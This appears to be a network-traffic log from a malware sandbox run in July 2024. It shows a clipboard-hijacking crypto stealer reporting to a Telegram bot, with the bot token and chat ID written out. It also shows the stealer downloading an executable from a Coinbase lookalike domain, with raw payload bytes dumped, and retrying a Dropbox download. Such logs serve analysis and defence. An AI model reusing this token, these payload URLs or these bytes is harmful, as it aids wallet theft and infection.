/bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%F0%9F%A6%A0%201.0.0%0A%F0%9F%A4%96%20ID:%20%20%3Ccode%3EF8C0C6DCE8981733A6%3C/code%3E%0D%0A%F0%9F%91%A4%20User:%20%3Ccode%3Euser/134349%3C/code%3E%0D%0A%F0%9F%93%85%20%D0%94%D0%B0%D1%82%D0%B0%20%D1%83%D1%81%D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%BA%D0%B8/%D0%B7%D0%B0%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D1%8F:%20%3Ccode%3E06/07/2024%2011:27:15%3C/code%3E%0D%0A%E2%9A%99%EF%B8%8F%20%3Ccode%3EC:%5CProgramData%5CKMSAuto%5Caccc.exe%3C/code%3E%0D%0A%E2%9A%96%EF%B8%8F%20%D0%92%D0%B5%D1%81%20%D0%B1%D0%B8%D0%BB%D0%B4%D0%B0%20%3Ccode%3E617%20KB%3C/code%3E%0D%0A%F0%9F%97%92%20%D0%9A%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%BD%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D1%8B%20%D0%B8%20%D0%B7%D0%B0%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D1%8B%20%D0%B2%20%D1%84%D0%B0%D0%B9%D0%BB%D0%B0:%20%0A%0D%0A%D0%9D%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D0%BD%D1%8B%D0%B5%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%B2%20%D0%B1%D1%83%D1%84%D0%B5%D1%80%D0%B5%20%D [TRUNCATED] Host: api.telegram.org Connection: Keep-Alive
2024-07-06 11:27:27 UTC	389	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 06 Jul 2024 11:27:27 GMT Content-Type: application/json Content-Length: 1361 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-07-06 11:27:27 UTC	1361	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 36 33 30 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 32 33 38 31 35 30 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 42 6f 74 73 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 42 6f 74 73 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 37 39 35 34 38 30 34 36 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 30 32 36 35 32 34 37 2c 22 74 65 78 74 22 Data Ascii: {"ok":true,"result":{"message_id":26307,"from":{"id":6082381502,"is_bot":true,"first_name":"DiamotrixBotss","username":"DiamotrixBotss_bot"},"chat":{"id":5795480469,"first_name":"Diamotrix","username":"Diamotrix","type":"private"},"date":1720265247,"text"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49771	162.125.66.15	443	7244	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:27:29 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-07-06 11:27:29 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sat, 06 Jul 2024 11:27:29 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 7844d9b610e94b3e9958b7e12e5481b1 Connection: close
2024-07-06 11:27:29 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49774	162.125.66.15	443	7244	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:27:30 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-07-06 11:27:30 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sat, 06 Jul 2024 11:27:30 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 9367e727cb7140928822be84efec2857 Connection: close
2024-07-06 11:27:30 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49776	162.125.66.15	443	7244	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:27:31 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-07-06 11:27:32 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sat, 06 Jul 2024 11:27:31 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: fc26f50bdac0430aa2363f38f94c5dfb Connection: close
2024-07-06 11:27:32 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49780	162.125.66.15	443	7244	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:27:32 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-07-06 11:27:33 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sat, 06 Jul 2024 11:27:32 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: e980e04bf9cd4687969381d14d820f3b Connection: close
2024-07-06 11:27:33 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49822	188.114.97.3	443	7208	C:\Users\user\Desktop\xj40xovMsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:28:07 UTC	109	OUT	GET /event.php HTTP/1.1 User-Agent: Mozilla 5/0 Host: auth.xn--conbase-sfb.xyz Cache-Control: no-cache
2024-07-06 11:28:07 UTC	667	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:07 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 Content-Disposition: inline; filename="zbi.exe" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hi51Bp%2F%2F6p3%2BRDh4yZux1HjzSlEiJCuVErtLew%2By27gdFPXlNvKyonZdMCYM62HI9JDkyj8BXk5Q2G8%2FwmIObuQUv4JO24EWodEiGcGd7RH%2Fk96KWcEyjaTgNWqlykrJ3Q9JvFg7KdH6uPk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3fdf78760fab-EWR alt-svc: h3=":443"; ma=86400
2024-07-06 11:28:07 UTC	702	IN	Data Raw: 31 65 63 32 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9e c7 3a c2 da a6 54 91 da a6 54 91 da a6 54 91 da a6 55 91 16 a6 54 91 26 d1 ed 91 cf a6 54 91 26 d1 e8 91 d8 a6 54 91 44 06 93 91 db a6 54 91 1e 63 9b 91 91 a6 54 91 1e 63 9a 91 0b a6 54 91 1e 63 99 91 d1 a6 54 91 fd 60 87 91 d7 a6 54 91 fd 60 9d 91 db a6 54 91 da a6 c3 91 db a6 54 91 fd 60 98 91 db a6 54 91 52 69 63 68 da a6 54 91 00 00 00 00 00 00 00 00 00 Data Ascii: 1ec2MZ@!L!This program cannot be run in DOS mode.$:TTTUT&T&TDTcTcTcT`T`TT`TRichT
2024-07-06 11:28:07 UTC	1369	IN	Data Raw: 00 06 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f8 1b 00 00 00 d0 03 00 00 1c 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @@.reloc@B
2024-07-06 11:28:07 UTC	1369	IN	Data Raw: c7 0f 10 43 18 48 8b 5c 24 30 f3 0f 7f 47 18 48 83 c4 20 5f c3 cc cc 40 53 48 81 ec d0 07 00 00 48 8b 05 d8 3f 03 00 48 33 c4 48 89 84 24 c0 07 00 00 48 8b d9 84 d2 74 46 48 8d 4c 24 20 33 d2 41 b8 cc 02 00 00 e8 d4 45 01 00 48 8b 4b 08 48 8d 54 24 20 c7 44 24 20 02 00 10 00 ff 15 2d 4d 02 00 85 c0 75 10 48 8d 0d c2 a6 02 00 e8 21 af 00 00 33 c0 eb 48 8b 84 24 c4 00 00 00 eb 3f 48 8d 8c 24 f0 02 00 00 33 d2 41 b8 d0 04 00 00 e8 8b 45 01 00 48 8b 4b 08 48 8d 94 24 f0 02 00 00 c7 84 24 20 03 00 00 02 00 10 00 ff 15 be 4c 02 00 f7 d8 48 1b c0 48 23 84 24 78 03 00 00 48 8b 8c 24 c0 07 00 00 48 33 cc e8 41 a6 00 00 48 81 c4 d0 07 00 00 5b c3 40 55 53 56 57 48 8d ac 24 08 f9 ff ff 48 81 ec f8 07 00 00 48 8b 05 0d 3f 03 00 48 33 c4 48 89 85 e0 06 00 00 41 8a f9 Data Ascii: CH\$0GH _@SHH?H3H$HtFHL$ 3AEHKHT$ D$ -MuH!3H$?H$3AEHKH$$ LHH#$xH$H3AH[@USVWH$HH?H3HA
2024-07-06 11:28:07 UTC	1369	IN	Data Raw: c3 cc 48 83 ec 28 48 8b 11 48 8b 02 48 63 48 04 48 8b 4c 11 48 48 85 c9 74 06 48 8b 01 ff 50 10 48 83 c4 28 c3 cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 48 83 ec 20 48 8b 7a 10 49 8b e8 48 8b f2 48 8b d9 49 3b f8 0f 82 d2 00 00 00 49 2b f8 4c 3b cf 49 0f 42 f9 48 3b ca 75 2c 4a 8d 04 07 48 39 41 10 0f 82 c2 00 00 00 48 83 79 18 10 48 89 41 10 72 03 48 8b 09 c6 04 08 00 33 d2 48 8b cb e8 c1 00 00 00 eb 7f 48 83 ff fe 0f 87 a7 00 00 00 48 39 79 18 73 0e 4c 8b 41 10 48 8b d7 e8 3f 01 00 00 eb 1b 48 85 ff 75 1b 48 21 79 10 48 83 79 18 10 72 05 48 8b 01 eb 03 48 8b c1 c6 00 00 48 85 ff 74 41 48 83 7e 18 10 72 03 48 8b 36 48 83 7b 18 10 72 05 48 8b 0b eb 03 48 8b cb 48 85 ff 74 0c 48 8d 14 2e 4c 8b c7 e8 e3 a2 00 00 48 83 7b 18 10 48 89 7b 10 72 05 48 Data Ascii: H(HHHcHHLHHtHPH(H\$Hl$Ht$WH HzIHHI;I+L;IBH;u,JH9AHyHArH3HHH9ysLAH?HuH!yHyrHHHtAH~rH6H{rHHHtH.LH{H{rH
2024-07-06 11:28:07 UTC	1369	IN	Data Raw: d0 fe ff ff ff 49 89 5b 18 49 89 73 20 48 8b 05 39 35 03 00 48 33 c4 48 89 44 24 40 48 8b da 48 8b f1 49 89 4b d8 49 89 53 e0 83 64 24 20 00 48 c7 41 18 0f 00 00 00 48 83 61 10 00 c6 01 00 45 33 c0 48 8d 15 ec 9c 02 00 e8 f7 f8 ff ff c7 44 24 20 01 00 00 00 33 ff 48 39 7b 10 76 6c 48 8b 43 18 48 83 f8 10 72 05 48 8b 0b eb 03 48 8b cb 80 3c 39 41 7c 2c 48 83 f8 10 72 05 48 8b 0b eb 03 48 8b cb 80 3c 39 5a 7f 18 48 83 f8 10 72 05 48 8b 03 eb 03 48 8b c3 44 8a 04 38 41 80 c0 20 eb 12 48 83 f8 10 72 05 48 8b 03 eb 03 48 8b c3 44 8a 04 38 ba 01 00 00 00 48 8b ce e8 8c 06 00 00 48 ff c7 48 3b 7b 10 72 94 48 83 7b 18 10 72 08 48 8b 0b e8 e8 a4 00 00 48 c7 43 18 0f 00 00 00 48 83 63 10 00 c6 03 00 48 8b c6 48 8b 4c 24 40 48 33 cc e8 64 9b 00 00 48 8b 5c 24 70 48 Data Ascii: I[Is H95H3HD$@HHIKISd$ HAHaE3HD$ 3H9{vlHCHrHH<9A\|,HrHH<9ZHrHHD8A HrHHD8HHH;{rH{rHHCHcHHL$@H3dH\$pH
2024-07-06 11:28:07 UTC	1369	IN	Data Raw: c6 07 00 48 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc 40 53 48 83 ec 20 48 83 79 18 08 48 8b d9 72 08 48 8b 09 e8 3c a0 00 00 33 c0 48 c7 43 18 07 00 00 00 48 89 43 10 66 89 03 48 83 c4 20 5b c3 cc 40 53 48 83 ec 20 48 8b d9 48 8b 09 48 85 c9 74 13 e8 0e a0 00 00 48 83 23 00 48 83 63 08 00 48 83 63 10 00 48 83 c4 20 5b c3 cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 8b d9 48 8b 49 08 48 8b fa 48 3b d1 0f 83 b4 00 00 00 48 39 13 0f 87 ab 00 00 00 48 2b 3b 48 b8 1b ca 6b 28 af a1 bc 06 48 f7 ef 48 8b fa 48 c1 ff 03 48 8b c7 48 c1 e8 3f 48 03 f8 48 3b 4b 10 75 08 48 8b cb e8 82 02 00 00 48 8b 4b 08 48 69 ff 30 01 00 00 be 30 01 00 00 48 03 3b 48 85 c9 0f 84 f9 00 00 00 48 8b c7 48 0b c1 83 e0 0f 0f 85 df 00 00 00 8d 50 02 8d 42 7e 0f 28 07 0f Data Ascii: HH\$0H _@SH HyHrH<3HCHCfH [@SH HHHtH#HcHcH [H\$Ht$WH HHIHH;H9H+;Hk(HHHHH?HH;KuHHKHi00H;HHHPB~(
2024-07-06 11:28:07 UTC	335	IN	Data Raw: f0 0f 29 49 f0 48 ff c8 75 af 0f 28 02 0f 29 01 0f 28 4a 10 0f 29 49 10 0f 28 42 20 0f 29 41 20 eb 08 4c 8b c5 e8 a1 93 00 00 48 03 fd 48 03 dd 48 3b fe 0f 85 61 ff ff ff 48 8b 6c 24 38 48 8b 74 24 40 48 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc 48 89 5c 24 08 57 48 81 ec 70 06 00 00 48 8b 05 34 2a 03 00 48 33 c4 48 89 84 24 60 06 00 00 48 8d 94 24 50 04 00 00 41 b8 04 01 00 00 33 c9 ff 15 13 38 02 00 33 ff 85 c0 75 07 32 c0 e9 a2 00 00 00 45 33 c9 48 8d 84 24 40 02 00 00 45 33 c0 41 8d 51 1c 33 c9 48 89 44 24 20 ff 15 d7 39 02 00 85 c0 78 d6 45 33 c9 48 8d 44 24 30 45 33 c0 41 8d 51 1a 33 c9 48 89 44 24 20 ff 15 b7 39 02 00 85 c0 78 b6 48 83 cb ff 48 8d 84 24 40 02 00 00 4c 8b c3 49 ff c0 66 42 39 3c 40 75 f6 48 8d 94 24 40 02 00 00 48 8d 8c 24 50 04 Data Ascii: )IHu()(J)I(B )A LHHH;aHl$8Ht$@HH\$0H _H\$WHpH4*H3H$`H$PA383u2E3H$@E3AQ3HD$ 9xE3HD$0E3AQ3HD$ 9xHH$@LIfB9<@uH$@H$P
2024-07-06 11:28:07 UTC	1369	IN	Data Raw: 37 32 31 30 0d 0a 00 00 48 81 c4 70 06 00 00 5f c3 cc cc cc 40 53 56 57 48 83 ec 30 49 8b 38 48 83 c8 ff 33 f6 48 ff c0 66 39 34 41 75 f7 8d 04 45 02 00 00 00 bb 01 00 00 00 45 33 c0 89 44 24 28 48 89 4c 24 20 48 8b cf 44 8b cb ff 15 2a 35 02 00 85 c0 74 03 40 8a de 48 8b cf ff 15 12 35 02 00 8a c3 48 83 c4 30 5f 5e 5b c3 48 89 5c 24 18 48 89 74 24 20 57 48 81 ec 50 04 00 00 48 8b 05 cf 28 03 00 48 33 c4 48 89 84 24 40 04 00 00 48 8b fa 48 8d 54 24 20 48 8b d9 49 2b d0 33 f6 41 0f b7 00 66 42 89 04 02 4d 8d 40 02 66 85 c0 75 ee 48 8d 4c 24 20 48 83 e9 02 48 8d 49 02 66 39 31 75 f7 48 8b 05 39 91 02 00 33 d2 48 89 01 48 8b 05 35 91 02 00 48 89 41 08 8b 05 33 91 02 00 89 41 10 0f b7 05 2d 91 02 00 66 89 41 14 48 8d 4c 24 20 ff 15 4a 36 02 00 48 8b ce 0f b7 Data Ascii: 7210Hp_@SVWH0I8H3Hf94AuEE3D$(HL$ HD*5t@H5H0_^[H\$Ht$ WHPH(H3H$@HHT$ HI+3AfBM@fuHL$ HHIf91uH93HH5HA3A-fAHL$ J6H
2024-07-06 11:28:07 UTC	1369	IN	Data Raw: 8b 0e 48 8b d3 ff cd e8 13 ff ff ff 48 8d 15 20 8d 02 00 8b c8 48 03 cb e8 b6 97 00 00 48 85 c0 75 29 48 83 c6 04 48 83 c7 02 85 ed 75 d2 33 c0 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 8b 7c 24 48 48 83 c4 20 41 5e c3 41 8b 4e 1c 48 8b d3 e8 c8 fe ff ff 44 0f b7 07 48 8b d3 8b c8 48 03 cb 42 8b 0c 81 e8 b3 fe ff ff eb c2 cc 40 53 56 57 41 54 41 55 41 56 41 57 48 83 ec 60 48 8b 05 75 23 03 00 48 33 c4 48 89 44 24 50 45 8b f0 48 8b f2 48 8b f9 33 db 89 5c 24 48 89 5c 24 4c 48 85 c9 0f 84 b9 00 00 00 48 85 d2 0f 84 b0 00 00 00 45 85 c0 0f 84 a7 00 00 00 48 8b ca e8 c7 fe ff ff 44 8b e0 85 c0 0f 84 94 00 00 00 c7 44 24 20 40 00 00 00 41 b9 00 30 00 00 45 8b c6 33 d2 48 8b cf ff 15 d8 30 02 00 4c 8b f8 48 85 c0 74 70 44 89 76 02 48 89 5c 24 20 45 8b ce Data Ascii: HH HHu)HHu3H\$0Hl$8Ht$@H\|$HH A^ANHDHHB@SVWATAUAVAWH`Hu#H3HD$PEHH3\$H\$LHHEHDD$ @A0E3H0LHtpDvH\$ E
2024-07-06 11:28:07 UTC	1369	IN	Data Raw: 41 5e 5f 5e 5d c3 40 53 48 83 ec 50 48 8b 05 8f 1e 03 00 48 33 c4 48 89 44 24 48 48 83 64 24 40 00 48 89 4c 24 30 48 8b d9 48 8d 4c 24 40 45 33 c9 45 33 c0 ba 1f 00 0f 00 c7 44 24 28 00 00 00 01 c7 44 24 20 02 00 00 00 ff 15 fb 2e 02 00 85 c0 74 06 48 83 c8 ff eb 39 48 8d 0d da 88 02 00 48 8b d1 e8 fa d8 00 00 85 c0 75 08 48 8b cb e8 c2 fb ff ff 48 8b cb ff 15 bd 2e 02 00 48 8b 54 24 40 48 83 c8 ff 48 8d 4a ff 48 83 f9 fd 48 0f 46 c2 48 8b 4c 24 48 48 33 cc e8 13 85 00 00 48 83 c4 50 5b c3 cc 40 55 53 56 57 41 54 41 56 41 57 48 8d ac 24 e0 fd ff ff 48 81 ec 20 03 00 00 48 8b 05 db 1d 03 00 48 33 c4 48 89 85 10 02 00 00 4c 8b f9 48 8b da 48 8d 4d 02 45 33 e4 33 d2 41 b8 06 02 00 00 4d 8b f1 66 44 89 65 00 e8 cf 23 01 00 48 8d 4d 00 48 83 c8 ff 48 ff c0 66 Data Ascii: A^_^]@SHPHH3HD$HHd$@HL$0HHL$@E3E3D$(D$ .tH9HHuHH.HT$@HHJHHFHL$HH3HP[@USVWATAVAWH$H HH3HLHHME33AMfDe#HMHHf

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49826	104.26.13.205	443	7244	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:28:09 UTC	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
2024-07-06 11:28:09 UTC	211	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:09 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 89ef3fed6a49423a-EWR
2024-07-06 11:28:09 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49832	104.26.13.205	443	7244	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:28:12 UTC	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
2024-07-06 11:28:12 UTC	211	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:12 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 89ef3ffbbc7c0f8c-EWR
2024-07-06 11:28:12 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49838	104.26.13.205	443	7244	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe

